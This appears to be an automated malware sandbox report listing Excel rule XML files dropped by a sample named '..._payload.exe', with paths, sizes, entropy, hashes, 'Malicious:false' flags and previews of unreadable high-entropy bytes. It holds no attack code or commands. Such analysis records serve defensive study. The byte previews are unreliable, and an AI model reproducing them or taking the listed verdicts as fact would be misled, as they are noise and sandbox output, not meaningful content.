                                                                                                                          Preview:<?xml....%r,S........e/.cft.....R...{.&rh... .5..p..,RP......w."Um...S_..Q.......b.B1.....5...U`...l5...M^D9.......8.w\R.D...V.S.?|Q...>.H."...J.}.3...j...J.....oE{\,%.3C.wa7.../.2..|.N......*g..N..z..`.~5~.r.....yIQL$...f...b..z.4..D.....0....!P.....?H.\.....ttx2...o..,......Z.t...X..r.<.R...$7.#.....l.-......n<N...g.AT....J9.a..HOk.2...sf...;J.d...Yv...Lz..0.(I.L7...B. .X41....>..%a..+i..X9.W..!.....#2.9S.!.B-CK....G.2..EH..#\.W.BN...,..4...9$.r..l.....o.{.R.4$r..&...w.my....r...*.].e.....:6..fI.C.o.1.K8.I.))..8O...e...W...w..,....0jv\...,......w.......'......K. .h1..4..0g..*..u..slEGs.T.......M.. .H.........) .#A..3F.b..@.A.TM#....P.^_.I.!mF|.;..4.=....b,. FA..._.;_....%.2....T..P6w.S.s...5#....T..q.. ........;....>.M....G.c6...G=.g"....L.A.e./w..G^#...R.....w.c...m....=X......vSD...a...D..E.d.d.2.]P.D...f!...FL-c`..J....)....2....j...T..+.....:....Y.O4$/.!).O#....F.J.......Gv.=......x.-x.^.~.$.\I...B8N0......E..,1QSy.....g..5

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63038v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1261
                                                                                                                          Entropy (8bit):7.8229765591976
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:WvtU7D2us1943isfLjJ7E9iO6k+4b58oM9TRx6q02hqtVoiXTb27bD:IRf43nh7EHZl8jpRwX2hqj1jaD
                                                                                                                          MD5:DB37C2BC4DF0BEB865E986FE15FA1C8B
                                                                                                                          SHA1:7891C952F11E8CF1731F5335F5263E8C132FEA93
                                                                                                                          SHA-256:A035C02C93855D690C40E7F306AE7587013161CDE67A306BFE2FBA00EBD1533A
                                                                                                                          SHA-512:68264C81F4A3B943E0809F3F3F2A2F51248FB90BEFF7E2FF8E97575C41166B0C04DB90CEBC3B7462CF28FAD574AC9323451C5C9638A4C977BB7694F6B6CC6952
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml......^.....a.'LvF.......0)W.H.. ...p7.5..C....0`..G/.....X..,a..H5...z\..n.....*n.4}x.W..N..L...:...q#..o.CD(*.{,.\4.kw.Ybch.(..7..3.\.uN....'Z.vP.K.`.bI..ds.6p.uV.......u.i.,.`.Y..y .G..P^...P.w..._B...H.U.c..M._.-...Y`.>r5./.....|..:6.qf.}....d.a=%cD.pQeE..bq. r...YGd..GDZ.U.e.,..S..d.8..v{k^.. .(.7..X-...ep.q.{...kS.*Bz...>..<q+B.C.7F.q....`.vIz.UB._...Y....C.fC....VK...S&4.+k.eb..:.......9.|1.m....!.9'.Lbj.c)m.[.E.4;..q..k......@G....y...E..`.D....L..y..._B..U..A......6.^.....f.Q.3..Oz...1...>.).!).t;E.ET5J .. jK..4-...=...{.GE..&m...F.H..%...5..j_P...2`TK.6".>....q[.JS^c....y.....+.M.c....1... b.6..c.=.i...<.....9.W...5C.[..1......f..0.C\..TA.......3...$3.....Q.:.._.k..qj.._c....AF..2!......i......J..3.y.._E.}..1E..n!.}..T....8.f|r..Q.....\pB@.<+..e..do.*So.n._.D....\[47...t@...T.&..A.;+*a..lD!..p;]...=Jm{.....l...Iq.s..#.E...dV;>dU........1..,.*....'.U/C.ub$........71...~A.!...3N.LLYp..Yd.K.\...f1...V...\.....<...H~!....=.XVb.@.d..z...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63040v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1268
                                                                                                                          Entropy (8bit):7.845476811182695
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ifl7WTZ3e4ovlEr815s0oF/6Con/Wc7AlYGCftPKUzQrCxmReke9R/qbD:ifl6Z3cEgHsP+/WXVCft3zwsmReke9tU
                                                                                                                          MD5:4D5810DAE5A7926AF18F6B44C5A1C3AD
                                                                                                                          SHA1:AD62362CBDED58C96D9108CD12BD19EAA5D34959
                                                                                                                          SHA-256:DFCA29F04F78F0452360E618935D7646AF3CEAAFF0DB32259681BB76E9E8AA18
                                                                                                                          SHA-512:A23A891ACD21C8D340F7DAF93E71628994E864DCFA4666B4F48EA786F1F9856DC53FFC774E41D6903B1E438AE539022D15CE60E42D7808E42B66AFDD82D59B3F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....2..B..{.'g.6-.o.h!g...._-.m/.%K*'W.F%.S.7.>V.@^.?.Xlu3......tI...K.r.e._.s~H%wOd....!.=8....t...G..?;w..m.I........;..'....O.._.i.....I..6..Ar....Ah*...x.....t.hO..E..>....Zr .n5c.#.<O.2...{.......!RMh< I.....$UEr%....z4\......i......~.|n".....'X.;iZ.qw)....#..U.9.....{...z.2...Wo..........V1...y.../..pl.U7X.._.Z...\.`.].b..U.u.-%.s!h.....+.`D.S.+.......h.`...M.5.c..?$...EO.....V*.<.D.t..@...!..;o.L.>.3...J.K...^.....}H.J.D....hl._ftC...j.aJ......[0.V.........I..M....Ai$....,...)m....UU.f.....$.7..{K..sO3L....FK.sG..Z...;Z...... .W..t..Ms..o.U.....;.B.0|.d.j.)ej.0e..`.4\..3N.+.7;.=~J..K.....,.1z.u..LZ.........D.Z.q.t..^x../D.=.BT..omE.....K.=.o...kj;.r/,.tvJ..!..a..D.......9V).u[.7..6....~.>...Vw.e....s=(...v.;A...5EG.4|.}........S=...h...............p?........^.P."^...~..yI<X...1.G[a..F..Enuw{...|.o.d/.\)....-.5H.........)./.,...g..S.>.Ai.\..m......}'.&..P..M.)...8?%...T9..3.....[0..".bM....|.W.m..,..A.y.n.F..e..9...J..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63041v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1815
                                                                                                                          Entropy (8bit):7.895602190597141
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:6XFTywH6G/Yo2zDyUrRVoD2EsiMLelOrO+nD:yTN6GQo23vRVornGjrO+D
                                                                                                                          MD5:036F31D9738D6023618AA74A76D2A0C2
                                                                                                                          SHA1:D63ECC9E8E40E5157EFA44D41D6B35014DEFD1B7
                                                                                                                          SHA-256:EE9561247784B5669A9E34B36E67A376DA2BEBE21F78E1334245546E692007CD
                                                                                                                          SHA-512:7ADF7BB1F51F9A6CA9FD742FCF0B0887E1827BBE89745B82DED497BB11A4C8225902F2B447C2A0A56FDC2BA6477D222D97FDBBE4ACA9EB60C4E33DE1DB4F4B9B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...m.OM.C_...li.*.[e..4j..c..6...~.Ss}Z.a.R..;U..@.`s....0.=....48.l.........~...u.4..Y.0.....Z..).A#. .v...4.OK.9..G..Z........6.F-f....Zi..05..7...U&..J.n%.....q'.$7,...B.p..l.R\.F. @.blW...t..>.<3.q...om.......i..`.k.....,3...r`...#.j.U..]......9j....@.Q..Z$.".j..u4=?J..Z.:c.zQ"$K..r.e.V1....khshM+.$.;...BA./@1.Mi.D|..._N;N.....K2pv.........O.._,@.Zg..P|k.R......>.}.%|...D.5..........._WN.De.M.+H.aM._Ns......k.fR.qg.d..1..mvA~.3,.....8^'..)l.E.g2.h8g...n..#.t.s..\.V.}]<....S3..<:g%.....eq....C.T....N...TE...1.....U!L...@.>..I90p%......i..o..J...5.......'..sy.c.......#...eQ)..%...d{..r.f>.W0Y/..<.)..!=.sq...=A....s..9M.2.%..G..H...'.Gq ...7..O[F=.j+,{..',=7.S&l...;.....5.B5.#A....B.^....{^5..;.......a].....y....\.KQ..........OK}O%..4.X.TLv.XU...OO.M....... ....F....l..!p..n.~H..j......P..NPfa.....4my.A(.)./|.............y.PT.=...!j.=.yQ..i..d......xL.,H..s[+..8....S..2..:.....C....ed...){..E./...s..:..5..y.j.<oZ.S.U.Y..4..A.b@.$./..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63042v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1004
                                                                                                                          Entropy (8bit):7.767758134452555
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Uu6bj6RdyU7PJDS32/6OpAL2q52DPd2UVNfaChlSDQdynPMt+BbD:Uupz7o32vG52D8UfaaSXEtUD
                                                                                                                          MD5:1A9186A36D3340D3534912FE59C277B9
                                                                                                                          SHA1:1899E20DB4B12278FF0A0315E013DAD061E164C8
                                                                                                                          SHA-256:D989DE8C699087830D8A11D02CD34A7F02AE772F72A9C8719A6D83DEFFA2B9E7
                                                                                                                          SHA-512:E76FFED33B48E2462297133DA189ABBD75D32760CCC77CE94BBC9BB4BB5F552337830E5806FEFC2C02BDE83B41B895D7B8E94FFC0DD3DFF8D9C1E49050DF6382
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlr..a..t..c.$.Q/%.E.7.<+.=.Al..q.50...~.B.......HJP.4d..o..v.{.GR.a...u......G4.p....-S.)..J....<D..:.....G,%.9aj4.<..S.a.bf.TR...... ~:..V.a_..K/....-....:Cdn.\...o...v.!..O.%.. ....,.1..q.Gf..U.N...[.*..yo......v.B:2.!....c.H+?.Y.6y.}}.l..#(U.b7....j&.x./.%.f.@)..2...o.<.rSv...E.....f.{pi..4.e...x.|.9v.ZQ......<.}..)?....M7...-..Z.;..T=......FR.P...h....R.l`,...O.n$|..-....".=.........B.Mh....F.%....k+...e.<s....y.J..+F'.oJ.K.....D....d......zZj..]Hj...=.li....!.t].`.HE.Uj....3..t.2..:.+.......q..(y...v....u....R....~G5!2G}`W,..M.2\FzuVz.d+.Y^......j.]0rA.U.e...ocn..cj..'...?*P..hq..<Z.j_q.r//T>.paFZ.....fa.F..+...r."S....A.....(=...@.`.#..._...>...9c8.R.P..'...D...9.;..I..Kb.>..!.c.J.yn.q.]j.U..Z..*....9;.....7$.%....&.Zh.J.l...?..<.2ypC.8.l...['.......adU...UW.{...B.p.g.J.!....-/..1.?........LN...6T^{ jc.;.e^x.`@4v....4.*-...z.Q....+...[n~K:.n:..P...9R.qd.;P..^0}phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63046v10.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1950
                                                                                                                          Entropy (8bit):7.898502314072651
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:OweZRxJRN7VcFUduo/Ay/HFxXSuvem/v9zQs83bPXD:veZBX7VcCdAaHFwYl9Ms+L
                                                                                                                          MD5:94CB8309B642479FD4305A84E2215716
                                                                                                                          SHA1:7E07C4396210571AB293AF4B71EB3CAD827F9215
                                                                                                                          SHA-256:15B1050AFB58D3CC525E1E80655EAD4BAA66188219DC3ECE31CF58AA8D9B95C5
                                                                                                                          SHA-512:F7CA124BB9B76D8F4E1EE7BF8C447DE7F69912749BACF194C0554DEF0F86609E522E0C1C280C8ECDD7CCED7CE14F3B5C9364E2ED9198BF46F0FD3CBFBFB0D5EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...n....y.B.z......<jFn;.......?j..M!..B..P..1_.YF.'...f..Un....f...?.z.......6.>E,A..;. .2&.b.....)h.R.........TMro...6.Qzy..y.n.4....../.'.L...-M.......z.5?.2@l........fb6......R=G.P6..7".....j..om.7*}&#..M.k.....7O.....mXh..i...lI... ~.3...*%...7..A8F....u,.w..d..wha7.y.m:f........l.5.y....x.5.\.YZk.a,...4k.ke..&.B.]...'"...>w..yH9....2.z#J.-.J<.:...qhHg...8.........4.'.r%..*...`?.s....B...4,MF..%.).g.}x...<|~...6>x..... ....Z]g.*.*...|y69P..........*%........D+S.8[...[..>...s...!7l..M...G.Ha...G..(..4..f8.......F.#....y..G..@.;.5......N.....7.#.P.R0[(...C..6~a.S.!u...^I.b.u....;..5]a......=....C...P.].Q.2.!.s..=.9..#...M.\..b..5.g...].EJ....b.>Vg.".....Y\...~(&xn.\k...n......;u...............O:.I...>...+.e...a..z...91".z.4...^~@.J.r^....g.|y.e...[..C.J3..N.e..Q..0.pG..6$......#..O ^.s}o...X...F..1..S[.2&...|N...Q{.....B....+...z@2........+.bCs..|.B7.l.)..`.y...%.......v..\..q..[.Y..B.>.....I....D.]...[....1k.z.VH;.....O........P..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63048v6.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4121
                                                                                                                          Entropy (8bit):7.95294796347915
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:OFdYNgUNw3wX5/QaJSVrvIaDexSBjhHQkXXpA+Gi495:4dYN0AX2aJarvIglYknMik
                                                                                                                          MD5:91E50025A92084EDBD9AF68CD1123C06
                                                                                                                          SHA1:D954A773281EF200DA4395C45B1BFE0EC66AA7F5
                                                                                                                          SHA-256:583709E201E31EF29E8E231D493BDF3B5B058B481776F63FA24C0EDF7771FF84
                                                                                                                          SHA-512:9663E33055D7EFD4638093B807A726E06D298F8B7E199693BE5C684BB28AE6A99520F83893D104D290BD02628C1A6BE03165455BFE8A150B4B679811B033EB2F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..;. 1.0w...O.`.H.K...$./b..k.r.hi..........M...].,.....}i .q...],6..dy.$o.$.N..&J&..:....\.e....'5k.s......G....Z..../.{...V..9R..y.E...`...v.i...~..8......t.M.....N.....}.]..4-..Q',#e#us..c...&P.8c?.n.K.XU.j.).t.m..&.*Lo......4...i......\......B5..k.A..B-2..5.].l.h....G...B..$..L...o.J..........J.,.dKr.9.`;......D.[..a.i.k)......p.p.w."B.b.B....FG.r....v./+..i...|s..tX..M....$2...HC..G...b..........q.-T7%c|.O!m..Z.b........&.o.5.,..~./........E.9Z..q1..}.e...g:..r.3N.2.'[Cl.,.......G.2A./...T......i..|.<..u.|.k.........F._J....fv.?.....<.d...e..z7=.|2.S.f...h.]...@_..&6..P\.e=...P6..7.-..."...}.]..@.Mj.....E$g...o7.c..q:q.7.J...q(...........B.y..b4.Rk*.sGk..NW.3./{z..<Z.)....=....V....9m..O.....i>.....[.K..l...U<."fu..._.]...hH}J;...\..9..q.svz./........UoG.....I..;.d..5.W<lV..X..._..Y..5o.I.;.:.]..8.mD...IEv.Q..+..$.6k...;..-.KvOz.*.....q?r_..b.......I. .z.v^...Pe. m..(:.?..A...C.r.......h.V.U../1B.F.t._.......#..b...Ep.=+.N.&^;

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63049v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1585
                                                                                                                          Entropy (8bit):7.869419401620119
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:IrJxisUMlk242gTntFIUtNeoRspbV4dMX9P6gJ7GfRjPt7mxehzJVNabD:InPUEkB2gnNBRspbV4Kt/AjPhzJ7YD
                                                                                                                          MD5:DB92BF90A338FE2A2AFB297795BBE8D4
                                                                                                                          SHA1:AB23A2AEDE3ABF7AF63484BFBBE7AB105C3BDB9D
                                                                                                                          SHA-256:83662C507D97A2B2B3A7B325B6B648AC5D34E677F892D8908F556EDA83F64DE6
                                                                                                                          SHA-512:F25AFAF0D68472A19F23A72F59B3C4EA85C7C59A2415D97F7DB5B0E03CFCE547ADED16E9E58952478CD2100ED343E015E8F591A4FFC5AE295049EAE0B50A065F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml(. k.5...2O...........3XD.{....N...|...?.C.7\sQ....b..+..X........Sl..ZP.b....HX.{...v..O.....J......}...5. E...J[.u....'.{.*..a._;_..$..Z..b+.2.N.l..,..,<:K..........Y:..b..k'.u...p2q.........+|S....E.C*...-...... .w....uC>.{~=$...`$...|...B.@..@........h.J.......e..ay.3GtT!VO..Q^...i.#.....S&M.'Q/\...F....@..8o..+..X.Z^h..Y..tYKF..v%S.]H...z.....f....}i.......N..-.i2..m@o-rEI.8r....P...KJ;~....h...O...w..........D.....1m.~..(](-.......|.\...C...Y.0......SOS...ow.V.....1.w.p...I..u.P.6L.2.B6P.@.......3......pj.........>...`@.j.i..@..u>)>...B.P..x.dK.Yih..:5..:...@/..Hs..P..G.........56Gy..e..O.....G.c...n.yRF.'.h.E^........f\..<S.1..i.,.*...1.`......t.....*.Ac....@....p..a.}.J.KK+.E..<.v..9.s........._*.~.4M.C..5...x!..&\..{.L.^....B.Q....s.......D.N.X.G._pL<L.9.9w.3R..m.Ez..<!.K......j..#.....T..g.....1ub.. '... $c.!..zB)a*..?G{9]....F...@.....Q-..\dYE...r2c.e..(.......}m.V...G...kt...0*..~..|..I.J..b.$)h5.$a....5..b_.....Vh=..W=

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63051v5.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1939
                                                                                                                          Entropy (8bit):7.895745702299958
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:qzVsA/VaNCFFo+o0/E1ApJE5rKrR9AjyxyzqY2oAJumnqxjn9ItLS8ns0IYD:qrVacFno0s1+JERKrPHcGLo+NnqxjncV
                                                                                                                          MD5:63A0360ECADC160F1E703320BB07DDC3
                                                                                                                          SHA1:08B4904086A7256E6E8B833483C0EEC6DCAD49D2
                                                                                                                          SHA-256:CFD6635E4F3972BC20C0A9E5C605514324336BAB8CBDDC467F2C8960C64637E6
                                                                                                                          SHA-512:33B5AC62E1679811CCB84EF7C548EC0B34EF677BF217F6AA511E27897B8CAF943E4D9CECD60867CE6F6B16B32871A8E657BA52013B77CB0E01C9DACF1466CFBA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..r..&......3..-..M....P....*...Z.Q..(..$..?.yLO.........a..X.dF.....<....*....?.).0..>..\D~...8.....(....A..l..tE.IR..8.P.j^G!........x:...-\. 3E}SW7.h'......G.6..b.:<*..U...QPq...."...&..Z...3...y.<...db%...@BmG@......K... +.|..u...`.M.KN.7..j...[o.4.b...2.L....[~M.P.O3mz[A.bjf.N..`"..}_..p......MJ..1.Z1...U,+#............b..R`F...........#.R.&.^.-........d..fi.VP.....].A.-..:..0..E.W..C\.....j...*hmo7_......Uf...>i.Fj0.....Nw......6jc>...t......w.......@.od........U}O..<#..{.......L).l^@.qR>.P$..}8...V...!v..W..1b,..6.K..I3n..{.M.f....n.E.v...2'r.....i.N._.I..F.1......?..)....|(....>.O)Py....u;..a....;..>Qr.......YOG...F....M..K....D2.R...U.."....p..-Y.*....@./n.....^..~A.a..4.[F=..{^.g.5.....q....f#...Q..oi.RG.c....X+0$.G#.H..:I.P9.#.7...:d`.l%..........VH3.7.=.........5..ncMm>....<...Hx.0]..C..........^..m.Q...........:A(..wV........-$.Y.@..WY...A.d.....1<....z...e.....O..H...s....B.....L.....1).&L...b..^.d..Z..PN1s4.5JZ..9.o9{.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63052v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3091
                                                                                                                          Entropy (8bit):7.938068119715432
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:f044aZe6hFfVEm14Fg5vdvl9KmjeR5KEIw7ToQFwP/ejAHWVHeqG6MabgXD:pReMf+M4Ed99VeqEIwHuX+oWMqG6MdT
                                                                                                                          MD5:675DD6E3DEF4E791860AB47D6603ABEC
                                                                                                                          SHA1:0FE79643B26ABECB5E246E98F2BDFD05806CEB78
                                                                                                                          SHA-256:327A5B4A541EEC7C362D06C69C37CAC212204B552123ECFCAC9BE5C47D3A79DF
                                                                                                                          SHA-512:75FD2797D803A18F545759B8A627D418DEAFE719ABC2C420A9D2416FFE31DE7C348BFE74EE34F7F6980E87A66EA826BC6CA6CE2E1654EBD41B134DB8D1C806D0
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml$u.^...p...4............M.3.I9...Ka..'q....LZu_...B.......&!...;.|..$3..H......k.?{3qFBcx..Wp.'..{..@7.....l.W....FV4.YV.....S....$._..vT.9.......E...H..g.@..|./x..9k.f4$eb6.&le)#..?Vy.l.F.}1.n.'D.....K....d!..........r..@........k...-@#..._...?:Y;h."...A7.q...,~...~7.y........D !...q.b[..O...G......)0.r.+...x|..m..ZD(V...!.6...P..n9nb.b.[N.w.b.1."...x..b.......2... ....vWz.v.A.6.2..........#`.v3.....z^.p...;o.... 4..]~Y.........Z?.........8.}...*. ..{.......g.....!...o.0!.."....$.........t.'..f5.S.W.Q........]..]...!....B...c.f.V..e....m>\krhE...uO.....o]i..lV.2...D.`S+m.....zpu....VN..cw%..p ..rd.]..}..G.6.....l~...TPI..3.H.D..F.tMb...:......+..j....ZoC.......bl.1D&..3.....Nq..@.[.e..%j.u.r..$m...-.%}.q.&Q..(...]........Z}'{..-..\.b...8.....{.e..{.T[..... .#[.D.....E...!...Q..R=..WN+.k.Si&$..c.!..&..K../.....a1A@.........9sg........UV.%=..g.^..b~..i.......HO,..|.*5.Y6...uW..].l..!.n..$.Jg3.Gw.5?..#V..v...~....o^.2......]........

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63053v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):980
                                                                                                                          Entropy (8bit):7.7827260040048065
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ZqrnLQ1wMsG7F8PNIb5oanuWU7SvOCzz28qjvWo5/fvbD:Z8E1wMVFQuqanuWbvOCzJ1+D
                                                                                                                          MD5:2046AE3E876E2CBC5738A60F6E7CB39D
                                                                                                                          SHA1:FC34E5C8CAFB03D263D6C2CBCCA74DAB5F3C16CF
                                                                                                                          SHA-256:893087256470A7ABF38BE86192043D7148705202CA41AD09229D0B71FEBBD7A3
                                                                                                                          SHA-512:D66B221D36C76876A347DCC5F8D5B857005A9202A9F4C83FF0E13A3730CE6D3EDBC63CE34A7D4553E70E2A2BD5F16993147E90C90BEB1073BEBE8ADDD6A21D48
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.#..,./x..Sk..|PC$...!.|u..Dv....V...n$.....0......''....>.....};...{..W....Q...T.J{#.e2....].M&.o.T....P.....>......!.z................4)$............../.`..,kU...!.Y$m(.j<..Zi.@....$.t.).VE.@.2..3.....Xi..Rr./w....h...@....k1n...X:.0k...[...........[...M.7..!..e....W..t.RC...g.q.....9 P...2....1..jg.x.b.".{...._..Y.&.|-.=.J..Pu...co..w.."....,.OH.X%&]..R......X.q.s.m...PK.[..:2Z......V..b~.7..._;..<3..2L...~..3e.Z...Nz..`.....L.e..0......C.6?l.+%.......4....6.,t.8....P>7.(.N}x.......O.,.:...l..~r..o..I.h;.\......9.....f:....F.Mv.....wh.Q..I4B...y~.l.EF.t<-L.:...UZ......3/.9n......N..B.\..w..B..}Y.d.D......EPu..:........y..N..&.G..;n.\..$}....}....A....).v....qn=X...W.z.B.O...\pcX.0.....%..s.9.'3WF.nb.....)...8..s.%......Ao.!..5)n.71..4...Q.Q<.N8.......o....=~.`.G.'&..s/V.E..e`!..]...}.Br.oQ...Y.........Dz.)U.WK.,.5~,U.....=3f.1.L.....&..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63054v5.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2404
                                                                                                                          Entropy (8bit):7.907080979101684
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:uWSI8LDjCU/1iaDzCmCjh/wWZhkLTnFpjKmQ6qx5b6+tbiZXEbqQ9juUD:lp8HN/1ia3FCjVwSqTnFNHQ6qXrZYc9J
                                                                                                                          MD5:7E0F17577224CE4477378B895B302B86
                                                                                                                          SHA1:37959106CE7D3BDD5530C2D4681FC04E9A111880
                                                                                                                          SHA-256:0044D86E69670C31CF6E20C9F01A9BC3DA6CC6474A4F10DF345282E7EA1A08C0
                                                                                                                          SHA-512:C6938224B4AB0A025536857F730CDA019F977C9D7EF423BEF0D7CAACD70BAE5645AF1037CB84107255A68C988918C33843C89F410644F6E1DA3F2593F1D652E7
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..z.d0...t.*.._....L0L5g?.O....=Y..n....Z!.9....<....b......$:...&..{6..^L.l{.K..|..q..=..s.~G...a.A.P.e sB......}..5.Z...c?..f.|....Ui.:89.c._..x..Q.S.Y.Y..!.G..c[_h...j....9.2....F.t`or.B..0....Z..T..:.......u$.i....QX.VR.>......p..JHGh.".j....-U...'...!...`+.5;$A.p..EP...0..T..T6.m..W.7...C.1.wt.bW.0.....1..^zB.I.z.w..,....=p....^..8..:......#...F.=..T.D..#C...v....o..Q.u....a.`../V$p.>Yw.. ZW.1.&0..HU!.............#u....z+..zk ;.......I...h.7.Er}.|=t.;..t0...UUp..#..R.(...x'.|.. @.:.....cx....K..e.h..-........v.....|.r..d....^..K....}..4.y.Z....;t..w.!.d..dW....H...U....4....g).G.`...1_.|.....@....r](...~...".r...C..(.+2j.:oI........Z.eD+gW].3....6..aS...W......Z...K...\...-.....ZnJ....]P..B. .;...+5.:F?.W..,F...0.[!.d.....m.~..Q.p*..."../.r.....!).>d....I|...R.....l.....$.~.J.ja....h...8..i..-.Gz.......}Z..X.,.s.0........_*}H.;.VP.... .ml...~...c.%....r#.............K.*Y@....L.M.XL<....z....|..^.w.).h:.A..FN-BI.U..Y.$

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63056v9.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3203
                                                                                                                          Entropy (8bit):7.936715266901375
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:tKBbACPJfviAsKwG+XvFnJoG7kRJSfOX324:tKBbACBXqKwRXvoG4RJSfOXm4
                                                                                                                          MD5:C7896A4804AB68672EB3700BF4A919EB
                                                                                                                          SHA1:586088D39E583514180D90E32A5F762C37A39A79
                                                                                                                          SHA-256:562292A78D67842898F9662C44CF278E394AD53F96A4E3A641465AA8EE05C6E5
                                                                                                                          SHA-512:CBC20DB710BE276F7A993356EF8E26933FE5A916C568A220AC783A206E119D6CC84A1F88A662289940BC2896688BC65BBBF14939E012A71F1449ED873E66D481
                                                                                                                          Malicious:false
